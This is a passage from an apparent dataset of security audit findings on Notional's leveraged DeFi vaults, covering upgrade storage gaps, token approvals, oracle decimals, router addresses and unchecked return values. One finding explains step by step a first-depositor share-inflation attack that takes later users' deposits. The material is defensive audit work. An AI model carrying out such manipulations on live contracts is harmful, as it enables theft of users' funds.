causing critical misbehaviors in the system.чConsider defining an appropriate storage gap in each upgradeable parent contract at the end of all the storage variable definitions as follows:\\n```\\nuint256[50] __gap; // gap to reserve storage in the contract for future variable additions\\n```\\n\\nReference\\nA similar issue was found in the past audit report:чStorage of Boosted3TokenAuraVault and MetaStable2TokenAuraVault vaults might be corrupted during upgrading, thus causing the vaults to be broken and assets to be stuck.ч```\\ngraph BT;\\n classDef nogap fill:#f96;\\n classDef hasgap fill:#99cc00;\\n MetaStable2TokenAuraVault-->MetaStable2TokenVaultMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->TwoTokenPoolMixin:::nogap\\n MetaStable2TokenVaultMixin:::nogap-->BalancerOracleMixin:::nogap\\n TwoTokenPoolMixin:::nogap-->PoolMixin:::nogap\\n PoolMixin:::nogap-->AuraStakingMixin:::nogap\\n PoolMixin:::nogap-->BalancerStrategyBase;\\n BalancerStrategyBase:::hasgap-->BaseStrategyVault:::hasgap\\n BalancerStrategyBase:::hasgap-->UUPSUpgradeable\\n```\\n -Did Not Approve To Zero FirstчmediumчAllowance was not set to zero first before changing the allowance.\\nSome ERC20 tokens (like USDT) do not work when changing the allowance from an existing non-zero allowance value. 
For example Tether (USDT)'s `approve()` function will revert if the current approval is not zero, to protect against front-running changes of approvals.\\nThe following attempt to call the `approve()` function without setting the allowance to zero first.\\n```\\nFile: TokenUtils.sol\\n function checkApprove(IERC20 token, address spender, uint256 amount) internal {\\n if (address(token) == address(0)) return;\\n\\n IEIP20NonStandard(address(token)).approve(spender, amount);\\n _checkReturnCode();\\n }\\n```\\n\\nHowever, if the token involved is an ERC20 token that does not work when changing the allowance from an existing non-zero allowance value, it will break a number of key functions or features of the protocol as the `TokenUtils.checkApprove` function is utilised extensively within the vault as shown below.\\n```\\nFile: TwoTokenPoolUtils.sol\\n function _approveBalancerTokens(TwoTokenPoolContext memory poolContext, address bptSpender) internal {\\n IERC20(poolContext.primaryToken).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n IERC20(poolContext.secondaryToken).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n // Allow BPT spender to pull BALANCER_POOL_TOKEN\\n IERC20(address(poolContext.basePool.pool)).checkApprove(bptSpender, type(uint256).max);\\n }\\n```\\n\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _approveBalancerTokens(ThreeTokenPoolContext memory poolContext, address bptSpender) internal {\\n poolContext.basePool._approveBalancerTokens(bptSpender);\\n\\n IERC20(poolContext.tertiaryToken).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n\\n // For boosted pools, the tokens inside pool context are AaveLinearPool tokens.\\n // So, we need to approve the _underlyingToken (primary borrow currency) for trading.\\n IBoostedPool underlyingPool = IBoostedPool(poolContext.basePool.primaryToken);\\n address primaryUnderlyingAddress = 
BalancerUtils.getTokenAddress(underlyingPool.getMainToken());\\n IERC20(primaryUnderlyingAddress).checkApprove(address(Deployments.BALANCER_VAULT), type(uint256).max);\\n }\\n```\\n\\n```\\nFile: TradingUtils.sol\\n /// @notice Approve exchange to pull from this contract\\n /// @dev approve up to trade.amount for EXACT_IN trades and up to trade.limit\\n /// for EXACT_OUT trades\\n function _approve(Trade memory trade, address spender) private {\\n uint256 allowance = _isExactIn(trade) ? trade.amount : trade.limit;\\n IERC20(trade.sellToken).checkApprove(spender, allowance);\\n }\\n```\\n\\n```\\nFile: StrategyUtils.sol\\n IERC20(buyToken).checkApprove(address(Deployments.WRAPPED_STETH), amountBought);\\n uint256 wrappedAmount = Deployments.WRAPPED_STETH.balanceOf(address(this));\\n /// @notice the amount returned by wrap is not always accurate for some reason\\n Deployments.WRAPPED_STETH.wrap(amountBought);\\n amountBought = Deployments.WRAPPED_STETH.balanceOf(address(this)) - wrappedAmount;\\n```\\nчIt is recommended to set the allowance to zero before increasing the allowance and use safeApprove/safeIncreaseAllowance.чA number of features within the vaults will not work if the `approve` function reverts.ч```\\nFile: TokenUtils.sol\\n function checkApprove(IERC20 token, address spender, uint256 amount) internal {\\n if (address(token) == address(0)) return;\\n\\n IEIP20NonStandard(address(token)).approve(spender, amount);\\n _checkReturnCode();\\n }\\n```\\n -`deleverageAccount` can be used by an address to enter a vault that would otherwise be restricted by the `requireValidAccount` check in `enterVault`чmediumч`deleverageAccount` can be used by an address to enter a vault that would otherwise be restricted by the `requireValidAccount` check in `enterVault`\\nWhen `enterVault` in `VaultAccountAction.sol` is called, the first function that is called is `requireValidAccount`. 
This function checks to ensure that the passed-in `account` parameter is not a system-level `account` address:\\n```\\nrequire(account != Constants.RESERVE); // Reserve address is address(0)\\nrequire(account != address(this));\\n(\\n uint256 isNToken,\\n /* incentiveAnnualEmissionRate */,\\n /* lastInitializedTime */,\\n /* assetArrayLength */,\\n /* parameters */\\n) = nTokenHandler.getNTokenContext(account);\\nrequire(isNToken == 0);\\n```\\n\\nWith the above checks, `requireValidAccount` ensures that any Notional system-level account cannot enter a vault. However, `deleverageAccount` in `VaultAccountAction.sol` allows liquidators to transfer vault shares from a liquidated account into their own account. In the case that a liquidator is not already entered into a vault, then `deleverageAccount` will instantiate a vault account for them (using _transferLiquidatorProfits) before depositing the liquidated account's vault shares into the newly-instantiated account. This effectively circumvents the `requireValidAccount` check in `enterVault`.чConsider updating the `require` statement in `_transferLiquidatorProfits` to the following:\\n```\\nrequire(liquidator.maturity == maturity, \"Vault Shares Mismatch\"); // dev: has vault shares\\n```\\n\\nRemoving the option of allowing addresses that do not have a maturity in the respective vault to receive shares and therefore implicitly enter a vault prevents Notional system accounts from being able to enter into vaults.чAny address that would otherwise be restricted from entering vaults via the `requireValidAccount` check would be able to circumvent that function using `deleverageAccount`. 
I assume these system-level accounts are restricted from entering vaults as they have access to internal Notional state and are used across the protocol, so having them be able to enter vaults could negatively impact Notional.\\nAssuming that all the relevant Notional system accounts are smart contracts that do not allow arbitrary calls, then having any of the system accounts themselves trigger this issue is infeasible. However, as a result of another issue it is possible for a vault to force an arbitrary address to deleverage accounts, which could be used to force a Notional system account to enter into a vault.ч```\\nrequire(account != Constants.RESERVE); // Reserve address is address(0)\\nrequire(account != address(this));\\n(\\n uint256 isNToken,\\n /* incentiveAnnualEmissionRate */,\\n /* lastInitializedTime */,\\n /* assetArrayLength */,\\n /* parameters */\\n) = nTokenHandler.getNTokenContext(account);\\nrequire(isNToken == 0);\\n```\\n -No Validation Check Against Decimal Of Secondary TokenчmediumчThere is no validation check against the decimal of the secondary token due to a typo. Thus, this will cause the vault to be broken entirely or the value of the shares to be stuck if a secondary token with more than 18 decimals is added.\\nThere is a typo in Line 65 within the `TwoTokenPoolMixin` contract. The validation at Line 65 should perform a check against the `secondaryDecimals` instead of the `primaryDecimals`. 
As such, no validation was performed against the secondary token.\\n```\\nFile: TwoTokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_, \\n AuraVaultDeploymentParams memory params\\n ) PoolMixin(notional_, params) {\\n..SNIP..\\n // If the underlying is ETH, primaryBorrowToken will be rewritten as WETH\\n uint256 primaryDecimals = IERC20(primaryAddress).decimals();\\n // Do not allow decimal places greater than 18\\n require(primaryDecimals <= 18);\\n PRIMARY_DECIMALS = uint8(primaryDecimals);\\n\\n uint256 secondaryDecimals = address(SECONDARY_TOKEN) ==\\n Deployments.ETH_ADDRESS\\n ? 18\\n : SECONDARY_TOKEN.decimals();\\n require(primaryDecimals <= 18);\\n SECONDARY_DECIMALS = uint8(secondaryDecimals);\\n }\\n```\\n\\nIf the decimal of the secondary tokens is more than 18, the `Stable2TokenOracleMath._getSpotPrice` will stop working as the code will revert in Line 24 below because the decimal of secondary tokens is more than 18.\\nWhen the `Stable2TokenOracleMath._getSpotPrice` function stop working, the vaults will be broken entirely because the settle vault and reinvest rewards functions will stop working too. 
This is because the settle vault and reinvest rewards functions will call the `Stable2TokenOracleMath._getSpotPrice` function internally, resulting in a revert.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n // Prevents overflows, we don't expect tokens to be greater than 18 decimals, don't use\\n // equal sign for minor gas optimization\\n require(poolContext.primaryDecimals < 19); /// @dev primaryDecimals overflow\\n require(poolContext.secondaryDecimals < 19); /// @dev secondaryDecimals overflow\\n require(tokenIndex < 2); /// @dev invalid token index\\n```\\nчUpdate the code to perform the validation against the `secondaryDecimals` state variable.\\n```\\nconstructor(\\n NotionalProxy notional_, \\n AuraVaultDeploymentParams memory params\\n) PoolMixin(notional_, params) {\\n ..SNIP..\\n // If the underlying is ETH, primaryBorrowToken will be rewritten as WETH\\n uint256 primaryDecimals = IERC20(primaryAddress).decimals();\\n // Do not allow decimal places greater than 18\\n require(primaryDecimals <= 18);\\n PRIMARY_DECIMALS = uint8(primaryDecimals);\\n\\n uint256 secondaryDecimals = address(SECONDARY_TOKEN) ==\\n Deployments.ETH_ADDRESS\\n ? 18\\n : SECONDARY_TOKEN.decimals();\\n// Remove the line below\\n require(primaryDecimals <= 18);\\n// Add the line below\\n require(secondaryDecimals <= 18);\\n SECONDARY_DECIMALS = uint8(secondaryDecimals);\\n}\\n```\\nчThe `Stable2TokenOracleMath._getSpotPrice` will stop working, which will in turn cause the settle vault and reinvest rewards functions to stop working too. Since a vault cannot be settled, the vault is considered broken. 
If the reinvest rewards function cannot work, the value of users' shares will be stuck as the vault relies on reinvesting rewards to buy more BPT tokens from the market.\\nIn addition, there might be some issues when calculating the price of the tokens since the vault assumes that both primary and secondary tokens have a decimal equal to or less than 18 OR some overflow might occur when processing the token value.ч```\\nFile: TwoTokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_, \\n AuraVaultDeploymentParams memory params\\n ) PoolMixin(notional_, params) {\\n..SNIP..\\n // If the underlying is ETH, primaryBorrowToken will be rewritten as WETH\\n uint256 primaryDecimals = IERC20(primaryAddress).decimals();\\n // Do not allow decimal places greater than 18\\n require(primaryDecimals <= 18);\\n PRIMARY_DECIMALS = uint8(primaryDecimals);\\n\\n uint256 secondaryDecimals = address(SECONDARY_TOKEN) ==\\n Deployments.ETH_ADDRESS\\n ? 18\\n : SECONDARY_TOKEN.decimals();\\n require(primaryDecimals <= 18);\\n SECONDARY_DECIMALS = uint8(secondaryDecimals);\\n }\\n```\\n -Vault Share/Strategy Token Calculation Can Be Broken By First User/AttackerчmediumчA well-known attack vector for almost all shares-based liquidity pool contracts, where an early user can manipulate the price per share and profit from late users' deposits because of the precision loss caused by the rather large value of price per share.\\nNote: This issue affects MetaStable2 and Boosted3 balancer leverage vaults\\nFor simplicity's sake, we will simplify the `strategy token` minting formula as follows. Also, assume that the 1 `vault share` is equivalent to 1 `strategy token` for this particular strategy vault, therefore, we will use the term `vault share` and `strategy token` interchangeably here.\\n```\\nstrategyToken = (totalBPTHeld == 0) ? 
bptClaim : (bptClaim * totalStrategyToken) / totalBPTHeld\\n```\\n\\nThe vault minting formula is taken from the following:\\n```\\nFile: StrategyUtils.sol\\n /// @notice Converts BPT to strategy tokens\\n function _convertBPTClaimToStrategyTokens(StrategyContext memory context, uint256 bptClaim)\\n internal pure returns (uint256 strategyTokenAmount) {\\n if (context.totalBPTHeld == 0) {\\n // Strategy tokens are in 8 decimal precision, BPT is in 18. Scale the minted amount down.\\n return (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / \\n BalancerConstants.BALANCER_PRECISION;\\n }\\n\\n // BPT held in maturity is calculated before the new BPT tokens are minted, so this calculation\\n // is the tokens minted that will give the account a corresponding share of the new bpt balance held.\\n // The precision here will be the same as strategy token supply.\\n strategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.totalBPTHeld;\\n }\\n```\\n\\nIf the attacker who is the first depositor claims 1 BPT, he will receive 1 Strategy Token. So 1 BPT per Strategy Token. At this point in time, `totalBPTHeld = 1` and `totalStrategyToken = 1`.\\nThe attacker obtains 9999 BPT can be obtained from the open market. He proceeds to deposit the 9999 BPT into the Aura reward pool on behalf of the vault. At this point in time, `totalBPTHeld = 10000` and `totalStrategyToken = 1`. So 10000 BPT per Strategy Token. Refer to the \"How to increase the total BPT held?\" section below for more details.\\nTwo issues can occur from here.\\nIssue 1 - If bptClaim >= totalBPTHeld\\nThe following describes a scenario in which a user's assets are lost and stolen by an attacker. Assume that Alice deposits/borrow some assets and received 19999 BPT. Based on the formula, Alice will only receive 1 Strategy Token. 
She immediately loses 9999 BPT or half of her assets if she exits the vault or redeems the strategy tokens right after the deposit.\\n```\\nstrategyToken = (bptClaim * totalStrategyToken) / totalBPTHeld\\nstrategyToken = (19999 * 1) / 10000 = 1\\n```\\n\\nIf the attacker exits the vault right after Alice's deposit, the attacker will receive 14999 BPT. He profited 4999 BPT from this attack\\n```\\nbptReceived = (strategyToken * totalBPTHeld) / totalStrategyToken\\nbptReceived = (1 * 29999) / 2 = 14999\\n```\\n\\nIssue 2 - If bptClaim < totalBPTHeld\\nThe following describes a scenario in which a user's assets are lost entirely. Assume that Alice deposits/borrow some assets and received 9999 BPT\\n```\\nstrategyToken = (bptClaim * totalStrategyToken) / totalBPTHeld\\nstrategyToken = (9999 * 1) / 10000 = 0\\n```\\n\\nAs such, she deposited 9999 BPT but did not receive any strategy tokens in return.\\nHow to increase the total BPT held?\\nUnlike the vault design seen in other protocols, Notional's leverage vault does not compute the total BPT held by the vault directly via `BTP.balanceOf(address(vault))`. The vault deposit its BPT to the Aura Reward Pool. 
Therefore, it is not possible to increase the total BPT held by the vault simply by performing a direct BPT token transfer to the vault or Aura Reward Pool in an attempt to increase it.\\nHowever, there is a workaround to increase the total BPT held by the vault, and this can be executed by anyone.\\nThe `totalBPTHeld` within the vault is obtained by calling the `PoolMixin._bptHeld` function.\\n```\\nFile: PoolMixin.sol\\n function _baseStrategyContext() internal view returns(StrategyContext memory) {\\n return StrategyContext({\\n totalBPTHeld: _bptHeld(),\\n settlementPeriodInSeconds: SETTLEMENT_PERIOD_IN_SECONDS,\\n tradingModule: TRADING_MODULE,\\n vaultSettings: BalancerVaultStorage.getStrategyVaultSettings(),\\n vaultState: BalancerVaultStorage.getStrategyVaultState(),\\n feeReceiver: FEE_RECEIVER\\n });\\n }\\n```\\n\\nWithin the `PoolMixin._bptHeld` function, it will call the `AURA_REWARD_POOL.balanceOf(address(this))` to retrieve the number of BPT that the vault has deposited into the Aura Reward Pool.\\n```\\nFile: PoolMixin.sol\\n /// @dev Gets the total BPT held by the aura reward pool\\n function _bptHeld() internal view returns (uint256) {\\n return AURA_REWARD_POOL.balanceOf(address(this));\\n }\\n```\\n\\nThe following is the contract of the AURA_REWARD_POOL taken from the Etherscan. Note that the `AURA_REWARD_POOL.balanceOf` will retrieve the number of BPT tokens held by an account. 
In this example, the account will be the vault's address.\\n```\\nFile: BaseRewardPool4626.sol\\n/**\\n * @dev Returns the amount of tokens owned by `account`.\\n */\\nfunction balanceOf(address account) public view override(BaseRewardPool, IERC20) returns (uint256) {\\n return BaseRewardPool.balanceOf(account);\\n}\\n```\\n\\n```\\nFile: BaseRewardPool.sol\\nfunction balanceOf(address account) public view virtual returns (uint256) {\\n return _balances[account];\\n}\\n```\\n\\nTo increase the balance, the `deposit(uint256 _pid, uint256 _amount, bool _stake)` function of Aura's Booster contract can be called. However, the problem is that this function will deposit to the `msg.sender` and there is no way to spoof the vault's address. Thus, using this function will not work.\\nHowever, there is a second method that can be used to perform a deposit. The `AURA_REWARD_POOL` point to the `BaseRewardPool4626`, thus the reward pool is an ERC4626 vault. The Aura's ERC4626 vault supports an alternative deposit function called `BaseRewardPool4626.deposit` that allows anyone to deposit on behalf of another account. 
An attacker can leverage the `BaseRewardPool4626.deposit` function by specifying the `receiver` parameter to be the `vault.address` in an attempt to increase the total BPT tokens held by the vault.\\n```\\nFile: BaseRewardPool4626.sol\\n/**\\n * @notice Mints `shares` Vault shares to `receiver`.\\n * @dev Because `asset` is not actually what is collected here, first wrap to required token in the booster.\\n */\\nfunction deposit(uint256 assets, address receiver) public virtual override nonReentrant returns (uint256) {\\n // Transfer \"asset\" (crvLP) from sender\\n IERC20(asset).safeTransferFrom(msg.sender, address(this), assets);\\n\\n // Convert crvLP to cvxLP through normal booster deposit process, but don't stake\\n uint256 balBefore = stakingToken.balanceOf(address(this));\\n IDeposit(operator).deposit(pid, assets, false);\\n uint256 balAfter = stakingToken.balanceOf(address(this));\\n\\n require(balAfter.sub(balBefore) >= assets, \"!deposit\");\\n\\n // Perform stake manually, now that the funds have been received\\n _processStake(assets, receiver);\\n\\n emit Deposit(msg.sender, receiver, assets, assets);\\n emit Staked(receiver, assets);\\n return assets;\\n}\\n```\\n\\n```\\nFile: BaseRewardPool.sol \\n/**\\n* @dev Generic internal staking function that basically does 3 things: update rewards based\\n* on previous balance, trigger also on any child contracts, then update balances.\\n* @param _amount Units to add to the users balance\\n* @param _receiver Address of user who will receive the stake\\n*/\\nfunction _processStake(uint256 _amount, address _receiver) internal updateReward(_receiver) {\\n require(_amount > 0, 'RewardPool : Cannot stake 0');\\n\\n //also stake to linked rewards\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).stake(_receiver, _amount);\\n }\\n\\n _totalSupply = _totalSupply.add(_amount);\\n _balances[_receiver] = _balances[_receiver].add(_amount);\\n}\\n```\\nчConsider requiring a minimal amount of 
strategy tokens to be minted for the first minter, and send a portion of the initial mints as a reserve to the Notional Treasury so that the pricePerShare/pricePerStrategyToken can be more resistant to manipulation.\nReference\nA similar issue was found in a past Sherlock auditчThe attacker can profit from future users' deposits while the late users will lose part of their funds to the attacker. Additionally, it is also possible for users to get no share in return for their deposited funds.ч```\nstrategyToken = (totalBPTHeld == 0) ? bptClaim : (bptClaim * totalStrategyToken) / totalBPTHeld\n```\n -UniV2Adapter#getExecutionData doesn't properly handle native ETH swapsчmediumчUniV2Adapter#getExecutionData doesn't properly account for native ETH trades which makes them impossible. Neither method selected supports direct ETH trades, and sender/target are not set correctly for TradingUtils_executeTrade to automatically convert\n```\nspender = address(Deployments.UNIV2_ROUTER);\ntarget = address(Deployments.UNIV2_ROUTER);\n// msgValue is always zero for uniswap\n\nif (\n tradeType == TradeType.EXACT_IN_SINGLE ||\n tradeType == TradeType.EXACT_IN_BATCH\n) {\n executionCallData = abi.encodeWithSelector(\n IUniV2Router2.swapExactTokensForTokens.selector,\n trade.amount,\n trade.limit,\n data.path,\n from,\n trade.deadline\n );\n} else if (\n tradeType == TradeType.EXACT_OUT_SINGLE ||\n tradeType == TradeType.EXACT_OUT_BATCH\n) {\n executionCallData = abi.encodeWithSelector(\n IUniV2Router2.swapTokensForExactTokens.selector,\n trade.amount,\n trade.limit,\n data.path,\n from,\n trade.deadline\n );\n}\n```\n\nUniV2Adapter#getExecutionData either returns the swapTokensForExactTokens or swapExactTokensForTokens, neither of which supports native ETH. It also doesn't set spender and target like UniV3Adapter, so _executeTrade won't automatically convert it to a WETH call. The result is that all Uniswap V2 calls made with native ETH will fail. 
Given that Notional operates in native ETH rather than WETH, this is an important feature that currently does not function.чThere are two possible solutions:\\nChange the way that target and sender are set to match the implementation in UniV3Adapter\\nModify the return data to return the correct selector for each case (swapExactETHForTokens, swapTokensForExactETH, etc.)\\nGiven that the infrastructure for Uniswap V3 already exists in TradingUtils_executeTrade the first option would be the easiest, and would give the same results considering it's basically the same as what the router is doing internally anyways.чUniswap V2 calls won't support native ETHч```\\nspender = address(Deployments.UNIV2_ROUTER);\\ntarget = address(Deployments.UNIV2_ROUTER);\\n// msgValue is always zero for uniswap\\n\\nif (\\n tradeType == TradeType.EXACT_IN_SINGLE ||\\n tradeType == TradeType.EXACT_IN_BATCH\\n) {\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapExactTokensForTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n} else if (\\n tradeType == TradeType.EXACT_OUT_SINGLE ||\\n tradeType == TradeType.EXACT_OUT_BATCH\\n) {\\n executionCallData = abi.encodeWithSelector(\\n IUniV2Router2.swapTokensForExactTokens.selector,\\n trade.amount,\\n trade.limit,\\n data.path,\\n from,\\n trade.deadline\\n );\\n}\\n```\\n -Deployments.sol uses the wrong address for UNIV2 router which causes all Uniswap V2 calls to failчmediumчDeployments.sol accidentally uses the Uniswap V3 router address for UNIV2_ROUTER which causes all Uniswap V2 calls to fail\\n```\\nIUniV2Router2 internal constant UNIV2_ROUTER = IUniV2Router2(0xE592427A0AEce92De3Edee1F18E0157C05861564);\\n```\\n\\nThe constant UNIV2_ROUTER contains the address for the Uniswap V3 router, which doesn't contain the \"swapExactTokensForTokens\" or \"swapTokensForExactTokens\" methods. 
As a result, all calls made to Uniswap V2 will revert.чChange UNIV2_ROUTER to the address of the V2 router:\\n```\\nIUniV2Router2 internal constant UNIV2_ROUTER = IUniV2Router2(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);\\n```\\nчUniswap V2 is totally unusableч```\\nIUniV2Router2 internal constant UNIV2_ROUTER = IUniV2Router2(0xE592427A0AEce92De3Edee1F18E0157C05861564);\\n```\\n -stakingContext.auraRewardPool.withdrawAndUnwrap boolean return value not handled in Boosted3TokenPoolUtils.sol and TwoTokenPoolUtils.solчmediumчstakingContext.auraRewardPool.withdrawAndUnwrap boolean return value not handled in Boosted3TokenPoolUtils.sol and TwoTokenPoolUtils.sol\\nWhen calling function _unstakeAndExitPool,\\nthe contract withdraw BPT tokens back to the vault for redemption\\nby calling\\n```\\nstakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false);\\n```\\n\\nhowever, the underlying call withdrawAndUnwrap returns boolean value, the contract does not handle the return value.\\nThe see the interface of the IAuraRewardPool already indicate that the underlying call returns value\\n```\\ninterface IAuraRewardPool {\\n function withdrawAndUnwrap(uint256 amount, bool claim) external returns(bool);\\n```\\n\\nand the underlying call with BaseRewardConvexPool.sol also returns the boolean\\n```\\n function withdrawAndUnwrap(uint256 amount, bool claim) public updateReward(msg.sender) returns(bool){\\n```\\nчWe recommend the project handle the return value when unstaking explicitly\\n```\\nbool unstaked = stakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false);\\nrequire(unstaked, 'unstake failed');\\n```\\nчBecause there are stacks of external call:\\nNotional -> auraRewardPool -> BaseRewardPool,\\nwithout handling the return value explicitly, the transaction may risk fails silently.ч```\\nstakingContext.auraRewardPool.withdrawAndUnwrap(bptClaim, false);\\n```\\n -stakingContext.auraBooster.deposit boolean return value not handled in 
Boosted3TokenPoolUtils.solчmediumчstakingContext.auraBooster.deposit boolean return value not handled in Boosted3TokenPoolUtils.sol\nthe function _joinPoolAndStake in Boosted3TokenPoolUtils.sol is used extensively when handling the token stake.\nHowever, when entering the stake and interacting with external contract, the logic does not handle the returned boolean value in the code below\n```\n // Transfer token to Aura protocol for boosted staking\n stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\n```\n\nIn the AuraBooster implementation, a Boolean is indeed returned to acknowledge that the deposit completed successfully.\n```\n /**\n * @notice Deposits an "_amount" to a given gauge (specified by _pid), mints a `DepositToken`\n * and subsequently stakes that on Convex BaseRewardPool\n */\n function deposit(uint256 _pid, uint256 _amount, bool _stake) public returns(bool){\n```\nчWe recommend the project handle the stakingContext.auraBooster.deposit boolean return value explicitly.\n```\n // Transfer token to Aura protocol for boosted staking\n bool staked = stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\n require(staked, 'stake failed');\n```\nчNotional -> AuraBooster -> BaseRewardPool\nWithout handling the boolean value explicitly, there is a risk that the transaction may fail silently.\nBecause there are two layers of external callч```\n // Transfer token to Aura protocol for boosted staking\n stakingContext.auraBooster.deposit(stakingContext.auraPoolId, bptMinted, true); // stake = true\n```\n -`CrossCurrencyfCashVault` Cannot Settle Its Assets In PiecesчmediumчThe `CrossCurrencyfCashVault` vault cannot settle its assets in pieces. Thus, it might cause the vault to incur unnecessary slippage.\nThe settle vault function is designed in a manner where its assets can be settled in pieces. 
Therefore, the `settleVault` function accepts a `strategyTokens` or `strategyTokensToRedeem` parameter to allow the caller to specify the number of strategy tokens to be settled.\\nThe reason as mentioned in Notional's walkthrough video (Refer to the explanation at 15.50min mark) is that in some cases the caller might want to break down into multiple transactions due to massive slippage.\\nFor instance, the vault might utilize a 2 day settlement period to allow the vault to settle its assets in pieces so that it can avoid unnecessary transaction costs associated with converting all its assets back to USDC in a single transaction.\\n```\\nFile: CrossCurrencyfCashVault.sol\\n /**\\n * @notice During settlement all of the fCash balance in the lend currency will be redeemed to the\\n * underlying token and traded back to the borrow currency. All of the borrow currency will be deposited\\n * into the Notional contract as asset tokens and held for accounts to withdraw. Settlement can only\\n * be called after maturity.\\n * @param maturity the maturity to settle\\n * @param settlementTrade details for the settlement trade\\n */\\n function settleVault(uint256 maturity, uint256 strategyTokens, bytes calldata settlementTrade) external {\\n require(maturity <= block.timestamp, \"Cannot Settle\");\\n VaultState memory vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n require(vaultState.isSettled == false);\\n require(vaultState.totalStrategyTokens >= strategyTokens);\\n\\n RedeemParams memory params = abi.decode(settlementTrade, (RedeemParams));\\n \\n // The only way for underlying value to be negative would be if the vault has somehow ended up with a borrowing\\n // position in the lend underlying currency. 
This is explicitly prevented during redemption.\\n uint256 underlyingValue = convertStrategyToUnderlying(\\n address(0), vaultState.totalStrategyTokens, maturity\\n ).toUint();\\n\\n // Authenticate the minimum purchase amount, all tokens will be sold given this slippage limit.\\n uint256 minAllowedPurchaseAmount = (underlyingValue * settlementSlippageLimit) / SETTLEMENT_SLIPPAGE_PRECISION;\\n require(params.minPurchaseAmount >= minAllowedPurchaseAmount, \"Purchase Limit\");\\n\\n NOTIONAL.redeemStrategyTokensToCash(maturity, strategyTokens, settlementTrade);\\n\\n // If there are no more strategy tokens left, then mark the vault as settled\\n vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n if (vaultState.totalStrategyTokens == 0) {\\n NOTIONAL.settleVault(address(this), maturity);\\n }\\n }\\n```\\n\\nDuring vault settlement, the `CrossCurrencyfCashVault._redeemFromNotional` function will be called, and the code in lines 252-262 will be executed. However, it was observed that the `strategyTokens` parameter is ignored, and the vault will forcefully settle all the strategy tokens in one go. 
As such, there is no way for the caller to break down the settle vault transaction into multiple transactions.\\n```\\nFile: CrossCurrencyfCashVault.sol\\n function _redeemFromNotional(\\n address account,\\n uint256 strategyTokens,\\n uint256 maturity,\\n bytes calldata data\\n ) internal override returns (uint256 borrowedCurrencyAmount) {\\n uint256 balanceBefore = LEND_UNDERLYING_TOKEN.balanceOf(address(this));\\n RedeemParams memory params = abi.decode(data, (RedeemParams));\\n\\n if (maturity <= block.timestamp) {\\n // Only allow the vault to redeem past maturity to settle all positions\\n require(account == address(this));\\n NOTIONAL.settleAccount(address(this));\\n (int256 cashBalance, /* */, /* */) = NOTIONAL.getAccountBalance(LEND_CURRENCY_ID, address(this));\\n\\n // It should never be possible that this contract has a negative cash balance\\n require(0 <= cashBalance && cashBalance <= int256(uint256(type(uint88).max)));\\n\\n // Withdraws all cash to underlying\\n NOTIONAL.withdraw(LEND_CURRENCY_ID, uint88(uint256(cashBalance)), true);\\n } else {\\n // Sells fCash on Notional AMM (via borrowing)\\n BalanceActionWithTrades[] memory action = _encodeBorrowTrade(\\n maturity,\\n strategyTokens,\\n params.maxBorrowRate\\n );\\n NOTIONAL.batchBalanceAndTradeAction(address(this), action);\\n\\n // Check that we have not somehow borrowed into a negative fCash position, vault borrows\\n // are not included in account context\\n AccountContext memory accountContext = NOTIONAL.getAccountContext(address(this));\\n require(accountContext.hasDebt == 0x00);\\n }\\n\\n uint256 balanceAfter = LEND_UNDERLYING_TOKEN.balanceOf(address(this));\\n \\n // Trade back to borrow currency for repayment\\n Trade memory trade = Trade({\\n tradeType: TradeType.EXACT_IN_SINGLE,\\n sellToken: address(LEND_UNDERLYING_TOKEN),\\n buyToken: address(_underlyingToken()),\\n amount: balanceAfter - balanceBefore,\\n limit: params.minPurchaseAmount,\\n deadline: block.timestamp,\\n 
exchangeData: params.exchangeData\\n });\\n\\n (/* */, borrowedCurrencyAmount) = _executeTrade(params.dexId, trade);\\n }\\n```\\nчIt is recommended to update the `CrossCurrencyfCashVault._redeemFromNotional` function to allow the vault to be settled in multiple transactions.чThe vault might incur unnecessary slippage during settlement as the settlement cannot be broken into multiple transactions.ч```\\nFile: CrossCurrencyfCashVault.sol\\n /**\\n * @notice During settlement all of the fCash balance in the lend currency will be redeemed to the\\n * underlying token and traded back to the borrow currency. All of the borrow currency will be deposited\\n * into the Notional contract as asset tokens and held for accounts to withdraw. Settlement can only\\n * be called after maturity.\\n * @param maturity the maturity to settle\\n * @param settlementTrade details for the settlement trade\\n */\\n function settleVault(uint256 maturity, uint256 strategyTokens, bytes calldata settlementTrade) external {\\n require(maturity <= block.timestamp, \"Cannot Settle\");\\n VaultState memory vaultState = NOTIONAL.getVaultState(address(this), maturity);\\n require(vaultState.isSettled == false);\\n require(vaultState.totalStrategyTokens >= strategyTokens);\\n\\n RedeemParams memory params = abi.decode(settlementTrade, (RedeemParams));\\n \\n // The only way for underlying value to be negative would be if the vault has somehow ended up with a borrowing\\n // position in the lend underlying currency. 
